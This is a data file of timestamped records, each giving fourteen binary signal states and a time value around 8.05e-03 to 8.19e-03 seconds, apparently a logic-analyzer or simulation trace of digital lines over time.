1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0503680e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0503920e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0504200e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0504440e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0504680e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0504920e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0505160e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0505400e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0505680e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0505920e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0506200e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0506440e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0506680e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0506920e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0507160e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0507400e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0507960e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0508200e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0508440e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0508680e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0508920e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0509160e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0509400e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0509680e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0509920e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0510200e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0510440e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0510680e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0510920e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0511160e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0511400e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0511680e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0511920e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0512200e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0512440e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0512680e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0512920e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0513160e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0513400e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0513680e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0513920e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0514200e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0514440e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0514680e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0514920e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0515160e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0515400e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0515680e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0515920e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0516200e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0516440e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0516680e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0516920e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0517160e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0517400e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0517680e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0517920e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0518200e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0518440e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0518680e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0518920e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0519160e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0519400e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0519680e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0519920e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0520200e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0520440e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0520680e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0520920e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0521160e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0521400e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0521680e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0521920e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0522200e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0522440e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0522680e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0522920e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0523160e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0523400e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0523680e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0523920e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0524200e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0524440e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0524680e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0524920e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0525160e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0525400e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0525680e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0525920e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0526200e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0526440e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0526680e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0526920e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0527160e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0527400e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0527680e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0527920e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0528200e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0528440e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0528680e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0528920e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0529160e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0529400e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0529680e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0529920e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0530200e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0530440e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0530680e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0530920e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0531160e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0531400e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0531680e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0531920e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0532200e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0532440e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0532680e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0532920e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0533160e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0533400e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0533680e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0533920e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0534200e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0534440e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0534680e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0534920e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0535160e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0535400e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0535680e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0535920e-03 1,0,1,1,0,1,0,0,0,1,0,0,0,0,8.0536200e-03 1,0,1,1,0,1,0,0,0,1,0,0,0,1,8.1783800e-03 0,0,1,1,0,1,0,0,0,1,0,0,0,1,8.1785720e-03 0,1,1,1,0,1,0,0,0,1,0,0,0,1,8.1785960e-03 0,1,1,1,0,1,0,0,0,1,0,1,0,1,8.1786120e-03 0,1,1,1,0,1,0,0,0,1,0,0,0,1,8.1786440e-03 0,1,1,1,0,1,0,0,0,1,0,0,1,1,8.1789480e-03 0,1,1,1,0,1,0,0,0,1,0,0,0,1,8.1789760e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,1,8.1789800e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,1,8.1790000e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,1,8.1790280e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,1,8.1790520e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,1,8.1790760e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,1,8.1791000e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,1,8.1791240e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,1,8.1791480e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,1,8.1791760e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,1,8.1792000e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1792160e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1792240e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1792520e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1792760e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1793000e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1793240e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1793760e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1794000e-03 0,1,1,1,0,1,0,0,0,1,0,0,0,0,8.1794040e-03 0,1,1,1,0,1,0,0,0,1,0,0,1,0,8.1794280e-03 0,1,1,1,0,1,0,0,0,1,0,0,0,0,8.1794520e-03 0,1,1,1,0,1,0,0,0,1,0,0,1,0,8.1795000e-03 0,1,1,1,0,1,0,0,0,1,0,0,0,0,8.1795240e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1795320e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1795480e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1795760e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1796000e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1796280e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1796520e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1796720e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1797000e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1797240e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1797480e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1797720e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1798000e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1798200e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1798480e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1798760e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1799000e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1799240e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1799480e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1799720e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1800000e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1800200e-03 0,1,1,1,0,1,0,0,0,1,0,0,0,0,8.1800280e-03 0,1,1,1,0,1,0,0,0,1,0,0,1,0,8.1800760e-03 0,1,1,1,0,1,0,0,0,1,0,0,0,0,8.1801000e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1801080e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1801240e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1801480e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1801720e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1802000e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1802240e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1802480e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1802760e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1803000e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1803240e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1803480e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1803720e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1804000e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1804240e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1804480e-03 0,1,1,1,0,1,0,0,0,1,0,0,0,0,8.1804520e-03 0,1,1,1,0,1,0,0,0,1,0,0,1,0,8.1805000e-03 0,1,1,1,0,1,0,0,0,1,0,0,0,0,8.1805240e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1805320e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1805480e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1805720e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1806000e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1806200e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1806480e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1806760e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1807000e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1807240e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1807480e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1807720e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1808000e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1808240e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1808480e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1808720e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1809000e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1809240e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1809480e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1809720e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1810240e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1810480e-03 0,1,1,1,0,1,0,0,0,1,0,0,0,0,8.1810520e-03 0,1,1,1,0,1,0,0,0,1,0,0,1,0,8.1810760e-03 0,1,1,1,0,1,0,0,0,1,0,0,0,0,8.1811000e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1811080e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1811240e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1811480e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1811720e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1812000e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1812240e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1812480e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1812760e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1813000e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1813240e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1813480e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1813720e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1814000e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1814240e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1814480e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1814760e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1815000e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1815240e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1815480e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1815720e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1816000e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1816240e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1816480e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1816760e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1817000e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1817240e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1817480e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1817760e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1818000e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1818280e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1818480e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1818760e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1819000e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1819520e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1819760e-03 0,1,1,1,0,1,0,0,0,1,0,0,0,0,8.1819800e-03 0,1,1,1,0,1,0,0,0,1,0,0,1,0,8.1820000e-03 0,1,1,1,0,1,0,0,0,1,0,0,0,0,8.1820280e-03 0,1,1,1,0,1,0,0,0,1,0,0,1,0,8.1820760e-03 0,1,1,1,0,1,0,0,0,1,0,0,0,0,8.1821000e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1821080e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1821240e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1821480e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1821760e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1822000e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1822280e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1822520e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1822760e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1823000e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1823240e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1823480e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1823760e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1824000e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1824280e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1824520e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1824760e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1825000e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1825240e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1825480e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1825760e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1826000e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1826280e-03 0,1,1,1,0,0,0,0,0,1,0,0,0,0,8.1826520e-03 0,1,1,1,0,1,0,0,0,1,0,0,0,0,8.1826560e-03 0,1,1,1,0,1,0,0,0,1,0,0,1,0,8.1827000e-03 0,1,1,1,0,1,0,0,0,1,0,0,0,0,8.1827240e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1827320e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1827480e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1827760e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1828000e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1828280e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1828520e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1828760e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1829000e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1829240e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1829480e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1829760e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1830000e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1830280e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1830520e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1830760e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1831000e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1831240e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1831480e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1831760e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1832000e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1832280e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1832520e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1832760e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1833000e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1833240e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1833480e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1833760e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1834000e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1834280e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1834520e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1834760e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1835000e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1835240e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1835480e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1835760e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1836000e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1836280e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1836520e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1836760e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1837000e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1837240e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1837480e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1837760e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1837960e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1838240e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1838480e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1838720e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1839000e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1839240e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1839480e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1839720e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1839960e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1840200e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1840480e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1840720e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1841000e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1841240e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1841480e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1841720e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1841960e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1842200e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1842480e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1842720e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1843000e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1843240e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1843480e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1843720e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1843960e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1844200e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1844480e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1844720e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1845000e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1845240e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1845480e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1845720e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1845960e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1846200e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1846480e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1846720e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1847000e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1847240e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1847480e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1847720e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1847960e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1848200e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1848480e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1848760e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1849000e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1849240e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1849480e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1849720e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1849960e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1850240e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1850480e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1850720e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1851000e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1851240e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1851480e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1851720e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1851960e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1852200e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1852480e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1852720e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1853000e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1853240e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1853480e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1853720e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1853960e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1854200e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1854440e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1854680e-03 0,1,1,1,0,0,0,0,0,0,0,0,1,0,8.1854960e-03 0,1,1,1,0,0,0,0,0,0,0,0,0,0,8.1855200e-03 